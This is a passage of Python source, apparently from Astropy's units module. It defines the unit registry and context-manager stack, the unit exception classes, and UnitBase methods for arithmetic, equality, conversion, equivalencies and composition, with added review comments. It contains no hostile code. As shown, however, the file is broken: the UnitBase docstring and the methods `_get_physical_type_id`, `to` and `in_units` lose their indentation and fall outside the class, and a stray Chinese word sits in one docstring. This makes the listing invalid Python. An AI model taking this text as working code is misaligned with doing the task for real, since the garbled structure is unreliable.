            self._by_physical_type = {k: v.copy() for k, v in
                                      six.iteritems(init._by_physical_type)}
        else:
            self._reset_units()
            self._reset_equivalencies()
            self.add_enabled_units(init)
            self.add_enabled_equivalencies(equivalencies)
    def _reset_units(self):
        # Clear every unit-related index.
        self._all_units = set()
        self._non_prefix_units = set()
        self._registry = {}
        self._by_physical_type = {}
    def _reset_equivalencies(self):
        # Clear the set of enabled equivalencies.
        self._equivalencies = set()
    @property
    def registry(self):
        # Mapping of unit name/alias -> unit instance.
        return self._registry
    @property
    def all_units(self):
        # Every enabled unit, including prefixed ones.
        return self._all_units
    @property
    def non_prefix_units(self):
        # Enabled units excluding PrefixUnit instances.
        return self._non_prefix_units
    def set_enabled_units(self, units):
        """
        Sets the units enabled in the unit registry.
        These units are searched when using
        `UnitBase.find_equivalent_units`, for example.
        Parameters
        ----------
        units : list of sequences, dicts, or modules containing units, or units
            This is a list of things in which units may be found
            (sequences, dicts or modules), or units themselves. The
            entire set will be "enabled" for searching through by
            methods like `UnitBase.find_equivalent_units` and
            `UnitBase.compose`.
        """
        self._reset_units()
        return self.add_enabled_units(units)
    def add_enabled_units(self, units):
        """
        Adds to the set of units enabled in the unit registry.
        These units are searched when using
        `UnitBase.find_equivalent_units`, for example.
        Parameters
        ----------
        units : list of sequences, dicts, or modules containing units, or units
            This is a list of things in which units may be found
            (sequences, dicts or modules), or units themselves. The
            entire set will be added to the "enabled" set for
            searching through by methods like
            `UnitBase.find_equivalent_units` and `UnitBase.compose`.
        """
        units = _flatten_units_collection(units)
        for unit in units:
            # Loop through all of the names first, to ensure all of them
            # are new, then add them all as a single "transaction" below.
            for st in unit._names:
                if (st in self._registry and unit != self._registry[st]):
                    raise ValueError(
                        "Object with name {0!r} already exists in namespace. "
                        "Filter the set of units to avoid name clashes before "
                        "enabling them.".format(st))
            for st in unit._names:
                self._registry[st] = unit
            self._all_units.add(unit)
            if not isinstance(unit, PrefixUnit):
                self._non_prefix_units.add(unit)
            # NOTE(review): this local shadows the builtin `hash`; it holds
            # the unit's physical-type identifier tuple.
            hash = unit._get_physical_type_id()
            self._by_physical_type.setdefault(hash, set()).add(unit)
    def get_units_with_physical_type(self, unit):
        """
        Get all units in the registry with the same physical type as
        the given unit.
        Parameters
        ----------
        unit : UnitBase instance
        """
        return self._by_physical_type.get(unit._get_physical_type_id(), set())
    @property
    def equivalencies(self):
        # Return a list copy so callers cannot mutate the internal set.
        return list(self._equivalencies)
    def set_enabled_equivalencies(self, equivalencies):
        """
        Sets the equivalencies enabled in the unit registry.
        These equivalencies are used if no explicit equivalencies are given,
        both in unit conversion and in finding equivalent units.
        This is meant in particular for allowing angles to be dimensionless.
        Use with care.
        Parameters
        ----------
        equivalencies : list of equivalent pairs
            E.g., as returned by
            `~astropy.units.equivalencies.dimensionless_angles`.
        """
        self._reset_equivalencies()
        return self.add_enabled_equivalencies(equivalencies)
    def add_enabled_equivalencies(self, equivalencies):
        """
        Adds to the set of equivalencies enabled in the unit registry.
        These equivalencies are used if no explicit equivalencies are given,
        both in unit conversion and in finding equivalent units.
        This is meant in particular for allowing angles to be dimensionless.
        Use with care.
        Parameters
        ----------
        equivalencies : list of equivalent pairs
            E.g., as returned by
            `~astropy.units.equivalencies.dimensionless_angles`.
        """
        # pre-normalize list to help catch mistakes
        equivalencies = _normalize_equivalencies(equivalencies)
        self._equivalencies |= set(equivalencies)
class _UnitContext(object):
    """
    Pushes a fresh `_UnitRegistry` onto the global stack on creation and
    pops it again on exit, restoring the previous registry.
    """
    def __init__(self, init=[], equivalencies=[]):
        # The registry is installed at construction time (not in
        # __enter__) so the set_enabled_*/add_enabled_* helpers take
        # effect immediately even when not used as a context manager.
        _unit_registries.append(
            _UnitRegistry(init=init, equivalencies=equivalencies))
    def __enter__(self):
        pass
    def __exit__(self, type, value, tb):
        _unit_registries.pop()
# Stack of active registries; the top (last) entry is the one in use.
_unit_registries = [_UnitRegistry()]
def get_current_unit_registry():
    """Return the unit registry currently at the top of the stack."""
    return _unit_registries[-1]
def set_enabled_units(units):
    """
    Sets the units enabled in the unit registry.
    These units are searched when using
    `UnitBase.find_equivalent_units`, for example.
    This may be used either permanently, or as a context manager using
    the ``with`` statement (see example below).
    Parameters
    ----------
    units : list of sequences, dicts, or modules containing units, or units
        This is a list of things in which units may be found
        (sequences, dicts or modules), or units themselves. The
        entire set will be "enabled" for searching through by methods
        like `UnitBase.find_equivalent_units` and `UnitBase.compose`.
    Examples
    --------
    >>> from astropy import units as u
    >>> with u.set_enabled_units([u.pc]):
    ...     u.m.find_equivalent_units()
    ...
      Primary name | Unit definition | Aliases
    [
      pc           | 3.08568e+16 m   | parsec  ,
    ]
    >>> u.m.find_equivalent_units()
      Primary name | Unit definition | Aliases
    [
      AU           | 1.49598e+11 m   | au, astronomical_unit            ,
      Angstrom     | 1e-10 m         | AA, angstrom                     ,
      cm           | 0.01 m          | centimeter                       ,
      earthRad     | 6.3568e+06 m    | R_earth, Rearth                  ,
      jupiterRad   | 7.1492e+07 m    | R_jup, Rjup, R_jupiter, Rjupiter ,
      lyr          | 9.46073e+15 m   | lightyear                        ,
      m            | irreducible     | meter                            ,
      micron       | 1e-06 m         |                                  ,
      pc           | 3.08568e+16 m   | parsec                           ,
      solRad       | 6.957e+08 m     | R_sun, Rsun                      ,
    ]
    """
    # get a context with a new registry, using equivalencies of the current one
    # (only the equivalencies survive; previously enabled units are dropped)
    context = _UnitContext(
        equivalencies=get_current_unit_registry().equivalencies)
    # in this new current registry, enable the units requested
    get_current_unit_registry().set_enabled_units(units)
    return context
def add_enabled_units(units):
    """
    Adds to the set of units enabled in the unit registry.
    These units are searched when using
    `UnitBase.find_equivalent_units`, for example.
    This may be used either permanently, or as a context manager using
    the ``with`` statement (see example below).
    Parameters
    ----------
    units : list of sequences, dicts, or modules containing units, or units
        This is a list of things in which units may be found
        (sequences, dicts or modules), or units themselves. The
        entire set will be added to the "enabled" set for searching
        through by methods like `UnitBase.find_equivalent_units` and
        `UnitBase.compose`.
    Examples
    --------
    >>> from astropy import units as u
    >>> from astropy.units import imperial
    >>> with u.add_enabled_units(imperial):
    ...     u.m.find_equivalent_units()
    ...
      Primary name | Unit definition | Aliases
    [
      AU           | 1.49598e+11 m   | au, astronomical_unit            ,
      Angstrom     | 1e-10 m         | AA, angstrom                     ,
      cm           | 0.01 m          | centimeter                       ,
      earthRad     | 6.3568e+06 m    | R_earth, Rearth                  ,
      ft           | 0.3048 m        | foot                             ,
      fur          | 201.168 m       | furlong                          ,
      inch         | 0.0254 m        |                                  ,
      jupiterRad   | 7.1492e+07 m    | R_jup, Rjup, R_jupiter, Rjupiter ,
      lyr          | 9.46073e+15 m   | lightyear                        ,
      m            | irreducible     | meter                            ,
      mi           | 1609.34 m       | mile                             ,
      micron       | 1e-06 m         |                                  ,
      mil          | 2.54e-05 m      | thou                             ,
      nmi          | 1852 m          | nauticalmile, NM                 ,
      pc           | 3.08568e+16 m   | parsec                           ,
      solRad       | 6.957e+08 m     | R_sun, Rsun                      ,
      yd           | 0.9144 m        | yard                             ,
    ]
    """
    # get a context with a new registry, which is a copy of the current one
    # (passing a registry to _UnitContext copies both units and equivalencies)
    context = _UnitContext(get_current_unit_registry())
    # in this new current registry, enable the further units requested
    get_current_unit_registry().add_enabled_units(units)
    return context
def set_enabled_equivalencies(equivalencies):
    """
    Sets the equivalencies enabled in the unit registry.
    These equivalencies are used if no explicit equivalencies are given,
    both in unit conversion and in finding equivalent units.
    This is meant in particular for allowing angles to be dimensionless.
    Use with care.
    Parameters
    ----------
    equivalencies : list of equivalent pairs
        E.g., as returned by
        `~astropy.units.equivalencies.dimensionless_angles`.
    Examples
    --------
    Exponentiation normally requires dimensionless quantities. To avoid
    problems with complex phases::
        >>> from astropy import units as u
        >>> with u.set_enabled_equivalencies(u.dimensionless_angles()):
        ...     phase = 0.5 * u.cycle
        ...     np.exp(1j*phase)  # doctest: +FLOAT_CMP
        <Quantity (-1+1.2246063538223773e-16j)>
    """
    # get a context with a new registry, using all units of the current one
    # (the copy keeps the enabled units; only the equivalencies are replaced)
    context = _UnitContext(get_current_unit_registry())
    # in this new current registry, enable the equivalencies requested
    get_current_unit_registry().set_enabled_equivalencies(equivalencies)
    return context
def add_enabled_equivalencies(equivalencies):
    """
    Adds to the equivalencies enabled in the unit registry.
    These equivalencies are used if no explicit equivalencies are given,
    both in unit conversion and in finding equivalent units.
    This is meant in particular for allowing angles to be dimensionless.
    Since no equivalencies are enabled by default, generally it is recommended
    to use `set_enabled_equivalencies`.
    Parameters
    ----------
    equivalencies : list of equivalent pairs
        E.g., as returned by
        `~astropy.units.equivalencies.dimensionless_angles`.
    """
    # get a context with a new registry, which is a copy of the current one
    context = _UnitContext(get_current_unit_registry())
    # in this new current registry, enable the further equivalencies requested
    get_current_unit_registry().add_enabled_equivalencies(equivalencies)
    return context
class UnitsError(Exception):
    """Base class for all unit-specific exceptions."""
class UnitScaleError(UnitsError, ValueError):
    """
    Used to catch the errors involving scaled units,
    which are not recognized by FITS format.
    """
    # Redundant `pass` removed: the docstring already forms the class body,
    # matching the style of the sibling exception classes.
class UnitConversionError(UnitsError, ValueError):
    """
    Used specifically for errors related to converting between units or
    interpreting units in terms of other units.
    Also subclasses `ValueError` so callers may catch it as such.
    """
class UnitTypeError(UnitsError, TypeError):
    """
    Used specifically for errors in setting to units not allowed by a class.
    E.g., would be raised if the unit of an `~astropy.coordinates.Angle`
    instances were set to a non-angular unit.
    Also subclasses `TypeError` so callers may catch it as such.
    """
class UnitsWarning(AstropyWarning):
    """
    The base class for unit-specific warnings.
    """
@six.add_metaclass(InheritDocstrings)
class UnitBase(object):
"""
Abstract base class for units.
Most of the arithmetic operations on units are defined in this
base class.
Should not be instantiated by users directly.
"""
# Make sure that __rmul__ of units gets called over the __mul__ of Numpy
# arrays to avoid element-wise multiplication.
__array_priority__ = 1000
    def __deepcopy__(self, memo):
        """Return ``self``: units must never be duplicated by deepcopy."""
        # This may look odd, but the units conversion will be very
        # broken after deep-copying if we don't guarantee that a given
        # physical unit corresponds to only one instance
        return self
    def _repr_latex_(self):
        """
        Generate latex representation of unit name. This is used by
        the IPython notebook to print a unit with a nice layout.
        Returns
        -------
        Latex string
        """
        # Delegate to the dedicated LaTeX formatter.
        return unit_format.Latex.to_string(self)
    def __bytes__(self):
        """Return string representation for unit"""
        return unit_format.Generic.to_string(self).encode('unicode_escape')
    if six.PY2:
        # On Python 2, str() must return bytes.
        __str__ = __bytes__
    def __unicode__(self):
        """Return string representation for unit"""
        return unit_format.Generic.to_string(self)
    if not six.PY2:
        # On Python 3, str() must return text.
        __str__ = __unicode__
    def __repr__(self):
        """Return ``Unit("...")``形式 — an eval-able representation."""
        string = unit_format.Generic.to_string(self)
        if six.PY2:
            # repr() must return bytes on Python 2.
            string = string.encode('unicode_escape')
        return 'Unit("{0}")'.format(string)
def _get_physical_type_id(self):
"""
Returns an identifier that uniquely identifies the physical
type of this unit. It is comprised of the bases and powers of
this unit, without the scale. Since it is hashable, it is
useful as a dictionary key.
"""
unit = self.decompose()
r = zip([x.name for x in unit.bases], unit.powers)
# bases and powers are already sorted in a unique way
# r.sort()
r = tuple(r)
return r
    @property
    def names(self):
        """
        Returns all of the names associated with this unit.
        """
        # Base implementation: an anonymous unit has no names.  Named
        # subclasses presumably override this — confirm in NamedUnit.
        raise AttributeError(
            "Can not get names from unnamed units. "
            "Perhaps you meant to_string()?")
    @property
    def name(self):
        """
        Returns the canonical (short) name associated with this unit.
        """
        raise AttributeError(
            "Can not get names from unnamed units. "
            "Perhaps you meant to_string()?")
    @property
    def aliases(self):
        """
        Returns the alias (long) names for this unit.
        """
        raise AttributeError(
            "Can not get aliases from unnamed units. "
            "Perhaps you meant to_string()?")
    @property
    def scale(self):
        """
        Return the scale of the unit.
        """
        # Default for a plain unit: no scaling applied.
        return 1.0
    @property
    def bases(self):
        """
        Return the bases of the unit.
        """
        # Default: the unit is its own (single) base.
        return [self]
    @property
    def powers(self):
        """
        Return the powers of the unit.
        """
        # Default: the single base appears to the first power.
        return [1]
    def to_string(self, format=unit_format.Generic):
        """
        Output the unit in the given format as a string.
        Parameters
        ----------
        format : `astropy.units.format.Base` instance or str
            The name of a format or a formatter object. If not
            provided, defaults to the generic format.
        Returns
        -------
        str
        """
        # Resolve a format name or instance to a formatter, then render.
        f = unit_format.get_format(format)
        return f.to_string(self)
    def __format__(self, format_spec):
        """Try to format units using a formatter."""
        try:
            return self.to_string(format=format_spec)
        except ValueError:
            # The spec is not a known unit format; fall back to ordinary
            # string formatting of the generic representation.
            return format(six.text_type(self), format_spec)
    @staticmethod
    def _normalize_equivalencies(equivalencies):
        """
        Normalizes equivalencies, ensuring each is a 4-tuple of the form::
            (from_unit, to_unit, forward_func, backward_func)
        Parameters
        ----------
        equivalencies : list of equivalency pairs, or `None`
        Returns
        -------
        A normalized list, including possible global defaults set by, e.g.,
        `set_enabled_equivalencies`, except when `equivalencies`=`None`,
        in which case the returned list is always empty.
        Raises
        ------
        ValueError if an equivalency cannot be interpreted
        """
        # Delegate validation to the module-level helper of the same name.
        normalized = _normalize_equivalencies(equivalencies)
        if equivalencies is not None:
            # None (unlike []) means "no equivalencies at all", so the
            # globally enabled defaults are only appended otherwise.
            normalized += get_current_unit_registry().equivalencies
        return normalized
    def __pow__(self, p):
        """Return this unit raised to the power ``p`` as a CompositeUnit."""
        return CompositeUnit(1, [self], [p])
    def __div__(self, m):
        """Divide this unit by ``m`` (a unit, unit string, or value)."""
        if isinstance(m, (bytes, six.text_type)):
            m = Unit(m)
        if isinstance(m, UnitBase):
            if m.is_unity():
                # Dividing by a dimensionless unity leaves self unchanged.
                return self
            return CompositeUnit(1, [self, m], [1, -1], _error_check=False)
        try:
            # Cannot handle this as Unit, re-try as Quantity
            from .quantity import Quantity
            return Quantity(1, self) / m
        except TypeError:
            return NotImplemented
    def __rdiv__(self, m):
        """Divide ``m`` by this unit (``m / unit``)."""
        if isinstance(m, (bytes, six.text_type)):
            return Unit(m) / self
        try:
            # Cannot handle this as Unit. Here, m cannot be a Quantity,
            # so we make it into one, fasttracking when it does not have a
            # unit, for the common case of <array> / <unit>.
            from .quantity import Quantity
            if hasattr(m, 'unit'):
                result = Quantity(m)
                result /= self
                return result
            else:
                return Quantity(m, self**(-1))
        except TypeError:
            return NotImplemented
__truediv__ = __div__
__rtruediv__ = __rdiv__
    def __mul__(self, m):
        """Multiply this unit by ``m`` (a unit, unit string, or value)."""
        if isinstance(m, (bytes, six.text_type)):
            m = Unit(m)
        if isinstance(m, UnitBase):
            # Multiplying by a dimensionless unity is a no-op either way.
            if m.is_unity():
                return self
            elif self.is_unity():
                return m
            return CompositeUnit(1, [self, m], [1, 1], _error_check=False)
        # Cannot handle this as Unit, re-try as Quantity.
        try:
            from .quantity import Quantity
            return Quantity(1, self) * m
        except TypeError:
            return NotImplemented
    def __rmul__(self, m):
        """Multiply ``m`` by this unit (``m * unit``)."""
        if isinstance(m, (bytes, six.text_type)):
            return Unit(m) * self
        # Cannot handle this as Unit. Here, m cannot be a Quantity,
        # so we make it into one, fasttracking when it does not have a unit
        # for the common case of <array> * <unit>.
        try:
            from .quantity import Quantity
            if hasattr(m, 'unit'):
                result = Quantity(m)
                result *= self
                return result
            else:
                return Quantity(m, self)
        except TypeError:
            return NotImplemented
    def __hash__(self):
        """Hash on (scale, name, power) — stable across equal units."""
        # This must match the hash used in CompositeUnit for a unit
        # with only one base and no scale or power.
        return hash((str(self.scale), self.name, str('1')))
    def __eq__(self, other):
        """Two units are equal when conversion between them is unity."""
        if self is other:
            return True
        try:
            # 'silent' keeps unparsable strings from raising noisily here.
            other = Unit(other, parse_strict='silent')
        except (ValueError, UnitsError, TypeError):
            return False
        # Other is Unit-like, but the test below requires it is a UnitBase
        # instance; if it is not, give up (so that other can try).
        if not isinstance(other, UnitBase):
            return NotImplemented
        try:
            return is_effectively_unity(self._to(other))
        except UnitsError:
            return False
    def __ne__(self, other):
        # Explicit __ne__ is required on Python 2 (no auto-negation).
        return not (self == other)
    def __le__(self, other):
        # Ordering compares the conversion scale to ``other``; a scale of
        # (effectively) unity counts as equal.
        scale = self._to(Unit(other))
        return scale <= 1. or is_effectively_unity(scale)
    def __ge__(self, other):
        scale = self._to(Unit(other))
        return scale >= 1. or is_effectively_unity(scale)
    def __lt__(self, other):
        return not (self >= other)
    def __gt__(self, other):
        return not (self <= other)
    def __neg__(self):
        # -unit delegates to __mul__, which yields a Quantity for a
        # non-unit multiplier (see __mul__ above).
        return self * -1.
    def is_equivalent(self, other, equivalencies=[]):
        """
        Returns `True` if this unit is equivalent to ``other``.
        Parameters
        ----------
        other : unit object or string or tuple
            The unit to convert to. If a tuple of units is specified, this
            method returns true if the unit matches any of those in the tuple.
        equivalencies : list of equivalence pairs, optional
            A list of equivalence pairs to try if the units are not
            directly convertible.  See :ref:`unit_equivalencies`.
            This list is in addition to possible global defaults set by, e.g.,
            `set_enabled_equivalencies`.
            Use `None` to turn off all equivalencies.
        Returns
        -------
        bool
        """
        # Merge in the globally enabled equivalencies (unless None).
        equivalencies = self._normalize_equivalencies(equivalencies)
        if isinstance(other, tuple):
            # Any member of the tuple matching is sufficient.
            return any(self.is_equivalent(u, equivalencies=equivalencies)
                       for u in other)
        other = Unit(other, parse_strict='silent')
        return self._is_equivalent(other, equivalencies)
    def _is_equivalent(self, other, equivalencies=[]):
        """Returns `True` if this unit is equivalent to `other`.

        See `is_equivalent`, except that a proper Unit object should be
        given (i.e., no string) and that the equivalency list should be
        normalized using `_normalize_equivalencies`.
        """
        if isinstance(other, UnrecognizedUnit):
            return False

        # Identical physical type id means directly convertible.
        if (self._get_physical_type_id() ==
                other._get_physical_type_id()):
            return True
        elif len(equivalencies):
            unit = self.decompose()
            other = other.decompose()
            for a, b, forward, backward in equivalencies:
                if b is None:
                    # after canceling, is what's left convertible
                    # to dimensionless (according to the equivalency)?
                    try:
                        (other/unit).decompose([a])
                        return True
                    except Exception:
                        pass
                else:
                    # The pair matches if our unit is equivalent to one
                    # side and `other` to the opposite side, in either
                    # direction.
                    if(a._is_equivalent(unit) and b._is_equivalent(other) or
                       b._is_equivalent(unit) and a._is_equivalent(other)):
                        return True

        return False
    def _apply_equivalencies(self, unit, other, equivalencies):
        """
        Internal function (used from `_get_converter`) to apply
        equivalence pairs.

        Returns a callable converting values in ``unit`` to values in
        ``other``, or raises `UnitConversionError` when no equivalency
        applies.
        """
        def make_converter(scale1, func, scale2):
            # Compose: scale into the equivalency's source unit, apply
            # the equivalency function, then scale into the target unit.
            def convert(v):
                return func(_condition_arg(v) / scale1) * scale2
            return convert

        for funit, tunit, a, b in equivalencies:
            if tunit is None:
                # Dimensionless-style equivalency: check whether the
                # ratio of the two units reduces to `funit` alone.
                try:
                    ratio_in_funit = (other.decompose() /
                                      unit.decompose()).decompose([funit])
                    return make_converter(ratio_in_funit.scale, a, 1.)
                except UnitsError:
                    pass
            else:
                # Try the forward direction (funit -> tunit)...
                try:
                    scale1 = funit._to(unit)
                    scale2 = tunit._to(other)
                    return make_converter(scale1, a, scale2)
                except UnitsError:
                    pass

                # ...then the backward direction (tunit -> funit).
                try:
                    scale1 = tunit._to(unit)
                    scale2 = funit._to(other)
                    return make_converter(scale1, b, scale2)
                except UnitsError:
                    pass

        def get_err_str(unit):
            # Include the physical type in the error message when it is
            # known, to make the failure easier to diagnose.
            unit_str = unit.to_string('unscaled')
            physical_type = unit.physical_type
            if physical_type != 'unknown':
                unit_str = "'{0}' ({1})".format(
                    unit_str, physical_type)
            else:
                unit_str = "'{0}'".format(unit_str)
            return unit_str

        unit_str = get_err_str(unit)
        other_str = get_err_str(other)

        raise UnitConversionError(
            "{0} and {1} are not convertible".format(
                unit_str, other_str))
    def _get_converter(self, other, equivalencies=[]):
        """Return a callable converting values in this unit to ``other``.

        Tries, in order: a plain scale factor, the supplied/enabled
        equivalencies, and finally equivalencies attached to ``other``
        itself.  Raises `UnitsError` when no route exists.
        """
        other = Unit(other)

        # First see if it is just a scaling.
        try:
            scale = self._to(other)
        except UnitsError:
            pass
        else:
            return lambda val: scale * _condition_arg(val)

        # if that doesn't work, maybe we can do it with equivalencies?
        try:
            return self._apply_equivalencies(
                self, other, self._normalize_equivalencies(equivalencies))
        except UnitsError as exc:
            # Last hope: maybe other knows how to do it?
            # We assume the equivalencies have the unit itself as first item.
            # TODO: maybe better for other to have a `_back_converter` method?
            if hasattr(other, 'equivalencies'):
                for funit, tunit, a, b in other.equivalencies:
                    if other is funit:
                        try:
                            # Convert to tunit first, then apply the
                            # backward function of other's equivalency.
                            # (Returned immediately, so capturing the
                            # loop variables in the lambda is safe.)
                            return lambda v: b(self._get_converter(
                                tunit, equivalencies=equivalencies)(v))
                        except Exception:
                            pass
            raise exc
    def _to(self, other):
        """
        Returns the scale to the specified unit.

        See `to`, except that a Unit object should be given (i.e., no
        string), and that all defaults are used, i.e., no
        equivalencies and value=1.
        """
        # There are many cases where we just want to ensure a Quantity is
        # of a particular unit, without checking whether it's already in
        # a particular unit.  If we're being asked to convert from a unit
        # to itself, we can short-circuit all of this.
        if self is other:
            return 1.0

        # Don't presume decomposition is possible; e.g.,
        # conversion to function units is through equivalencies.
        if isinstance(other, UnitBase):
            self_decomposed = self.decompose()
            other_decomposed = other.decompose()

            # Check quickly whether equivalent.  This is faster than
            # `is_equivalent`, because it doesn't generate the entire
            # physical type list of both units.  In other words it "fails
            # fast".  Note the identity (`is`) comparison of the bases:
            # decomposed bases are irreducible-unit singletons.
            if(self_decomposed.powers == other_decomposed.powers and
               all(self_base is other_base for (self_base, other_base)
                   in zip(self_decomposed.bases, other_decomposed.bases))):
                return self_decomposed.scale / other_decomposed.scale

        raise UnitConversionError(
            "'{0!r}' is not a scaled version of '{1!r}'".format(self, other))
def to(self, other, value=1.0, equivalencies=[]):
"""
Return the converted values in the specified unit.
Parameters
----------
other : unit object or string
The unit to convert to.
value : scalar int or float, or sequence convertible to array, optional
Value(s) in the current unit to be converted to the
specified unit. If not provided, defaults to 1.0
equivalencies : list of equivalence pairs, optional
A list of equivalence pairs to try if the units are not
directly convertible. See :ref:`unit_equivalencies`.
This list is in addition to possible global defaults set by, e.g.,
`set_enabled_equivalencies`.
Use `None` to turn off all equivalencies.
Returns
-------
values : scalar or array
Converted value(s). Input value sequences are returned as
numpy arrays.
Raises
------
UnitsError
If units are inconsistent
"""
return self._get_converter(other, equivalencies=equivalencies)(value)
def in_units(self, other, value=1.0, equivalencies=[]):
"""
Alias for `to` for backward compatibility with pynbody.
"""
return self.to(
other, value=value, equivalencies=equivalencies)
    def decompose(self, bases=set()):
        """
        Return a unit object composed of only irreducible units.

        Parameters
        ----------
        bases : sequence of UnitBase, optional
            The bases to decompose into.  When not provided,
            decomposes down to any irreducible units.  When provided,
            the decomposed result will only contain the given units.
            This will raise a `UnitsError` if it's not possible
            to do so.

        Returns
        -------
        unit : CompositeUnit object
            New object containing only irreducible unit objects.
        """
        # Abstract here; implemented by IrreducibleUnit, Unit and
        # CompositeUnit.
        raise NotImplementedError()
    def _compose(self, equivalencies=[], namespace=[], max_depth=2, depth=0,
                 cached_results=None):
        """Recursive worker behind `compose`.

        Greedily factors target units out of this unit's decomposition,
        recursing on the remainders up to ``max_depth``.  Results (or the
        raised `UnitsError`) are memoized in ``cached_results``, keyed by
        the decomposed unit's hash.
        """
        def is_final_result(unit):
            # Returns True if this result contains only the expected
            # units
            for base in unit.bases:
                if base not in namespace:
                    return False
            return True

        unit = self.decompose()
        key = hash(unit)

        cached = cached_results.get(key)
        if cached is not None:
            # A cached exception means this unit was previously found to
            # be unrepresentable; re-raise it rather than recomputing.
            if isinstance(cached, Exception):
                raise cached
            return cached

        # Prevent too many levels of recursion
        # And special case for dimensionless unit
        if depth >= max_depth:
            cached_results[key] = [unit]
            return [unit]

        # Make a list including all of the equivalent units
        units = [unit]
        for funit, tunit, a, b in equivalencies:
            if tunit is not None:
                if self._is_equivalent(funit):
                    scale = funit.decompose().scale / unit.scale
                    units.append(Unit(a(1.0 / scale) * tunit).decompose())
                elif self._is_equivalent(tunit):
                    scale = tunit.decompose().scale / unit.scale
                    units.append(Unit(b(1.0 / scale) * funit).decompose())
            else:
                if self._is_equivalent(funit):
                    units.append(Unit(unit.scale))

        # Store partial results
        partial_results = []
        # Store final results that reduce to a single unit or pair of
        # units
        if len(unit.bases) == 0:
            final_results = [set([unit]), set()]
        else:
            final_results = [set(), set()]

        for tunit in namespace:
            tunit_decomposed = tunit.decompose()
            for u in units:
                # If the unit is a base unit, look for an exact match
                # to one of the bases of the target unit.  If found,
                # factor by the same power as the target unit's base.
                # This allows us to factor out fractional powers
                # without needing to do an exhaustive search.
                # NOTE(review): this rebinds the loop variable `tunit`;
                # later iterations of the inner loop therefore see the
                # raised power -- presumably intentional, but confirm.
                if len(tunit_decomposed.bases) == 1:
                    for base, power in zip(u.bases, u.powers):
                        if tunit_decomposed._is_equivalent(base):
                            tunit = tunit ** power
                            tunit_decomposed = tunit_decomposed ** power
                            break

                composed = (u / tunit_decomposed).decompose()
                factored = composed * tunit
                len_bases = len(composed.bases)
                if is_final_result(factored) and len_bases <= 1:
                    final_results[len_bases].add(factored)
                else:
                    partial_results.append(
                        (len_bases, composed, tunit))

        # Do we have any minimal results?
        for final_result in final_results:
            if len(final_result):
                results = final_results[0].union(final_results[1])
                cached_results[key] = results
                return results

        partial_results.sort(key=operator.itemgetter(0))

        # ...we have to recurse and try to further compose
        results = []
        for len_bases, composed, tunit in partial_results:
            try:
                composed_list = composed._compose(
                    equivalencies=equivalencies,
                    namespace=namespace,
                    max_depth=max_depth, depth=depth + 1,
                    cached_results=cached_results)
            except UnitsError:
                composed_list = []
            for subcomposed in composed_list:
                results.append(
                    (len(subcomposed.bases), subcomposed, tunit))

        if len(results):
            results.sort(key=operator.itemgetter(0))

            # Keep only the results tied for the fewest bases.
            min_length = results[0][0]
            subresults = set()
            for len_bases, composed, tunit in results:
                if len_bases > min_length:
                    break
                else:
                    factored = composed * tunit
                    if is_final_result(factored):
                        subresults.add(factored)

            if len(subresults):
                cached_results[key] = subresults
                return subresults

        if not is_final_result(self):
            result = UnitsError(
                "Cannot represent unit {0} in terms of the given "
                "units".format(self))
            cached_results[key] = result
            raise result

        cached_results[key] = [self]
        return [self]
    def compose(self, equivalencies=[], units=None, max_depth=2,
                include_prefix_units=False):
        """
        Return the simplest possible composite unit(s) that represent
        the given unit.  Since there may be multiple equally simple
        compositions of the unit, a list of units is always returned.

        Parameters
        ----------
        equivalencies : list of equivalence pairs, optional
            A list of equivalence pairs to also list.  See
            :ref:`unit_equivalencies`.
            This list is in addition to possible global defaults set by, e.g.,
            `set_enabled_equivalencies`.
            Use `None` to turn off all equivalencies.

        units : set of units to compose to, optional
            If not provided, any known units may be used to compose
            into.  Otherwise, ``units`` is a dict, module or sequence
            containing the units to compose into.

        max_depth : int, optional
            The maximum recursion depth to use when composing into
            composite units.

        include_prefix_units : bool, optional
            When `True`, include prefixed units in the result.
            Default is `False`.

        Returns
        -------
        units : list of `CompositeUnit`
            A list of candidate compositions.  These will all be
            equally simple, but it may not be possible to
            automatically determine which of the candidates are
            better.
        """
        # Pre-normalize the equivalencies list
        equivalencies = self._normalize_equivalencies(equivalencies)

        # The namespace of units to compose into should be filtered to
        # only include units with bases in common with self, otherwise
        # they can't possibly provide useful results.  Having too many
        # destination units greatly increases the search space.

        def has_bases_in_common(a, b):
            # Direct base overlap; two dimensionless units trivially
            # share "no bases".
            if len(a.bases) == 0 and len(b.bases) == 0:
                return True
            for ab in a.bases:
                for bb in b.bases:
                    if ab == bb:
                        return True
            return False

        def has_bases_in_common_with_equiv(unit, other):
            # As above, but also follow one hop through the equivalency
            # pairs in either direction.
            if has_bases_in_common(unit, other):
                return True
            for funit, tunit, a, b in equivalencies:
                if tunit is not None:
                    if unit._is_equivalent(funit):
                        if has_bases_in_common(tunit.decompose(), other):
                            return True
                    elif unit._is_equivalent(tunit):
                        if has_bases_in_common(funit.decompose(), other):
                            return True
                else:
                    if unit._is_equivalent(funit):
                        if has_bases_in_common(dimensionless_unscaled, other):
                            return True
            return False

        def filter_units(units):
            # Keep only real UnitBase objects (skipping prefixed units
            # unless requested) that can contribute to the composition.
            filtered_namespace = set()
            for tunit in units:
                if (isinstance(tunit, UnitBase) and
                        (include_prefix_units or
                         not isinstance(tunit, PrefixUnit)) and
                        has_bases_in_common_with_equiv(
                            decomposed, tunit.decompose())):
                    filtered_namespace.add(tunit)
            return filtered_namespace

        decomposed = self.decompose()

        if units is None:
            units = filter_units(self._get_units_with_same_physical_type(
                equivalencies=equivalencies))
            if len(units) == 0:
                units = get_current_unit_registry().non_prefix_units
        elif isinstance(units, dict):
            units = set(filter_units(six.itervalues(units)))
        elif inspect.ismodule(units):
            units = filter_units(six.itervalues(vars(units)))
        else:
            units = filter_units(_flatten_units_collection(units))

        def sort_results(results):
            if not len(results):
                return []

            # Sort the results so the simplest ones appear first.
            # Simplest is defined as "the minimum sum of absolute
            # powers" (i.e. the fewest bases), and preference should
            # be given to results where the sum of powers is positive
            # and the scale is exactly equal to 1.0
            # (Successive stable sorts: the last key is the primary one.)
            results = list(results)
            results.sort(key=lambda x: np.abs(x.scale))
            results.sort(key=lambda x: np.sum(np.abs(x.powers)))
            results.sort(key=lambda x: np.sum(x.powers) < 0.0)
            results.sort(key=lambda x: not is_effectively_unity(x.scale))

            # Drop entries whose string form duplicates the previously
            # kept result.
            last_result = results[0]
            filtered = [last_result]
            for result in results[1:]:
                if str(result) != str(last_result):
                    filtered.append(result)
                    last_result = result
            return filtered

        return sort_results(self._compose(
            equivalencies=equivalencies, namespace=units,
            max_depth=max_depth, depth=0, cached_results={}))
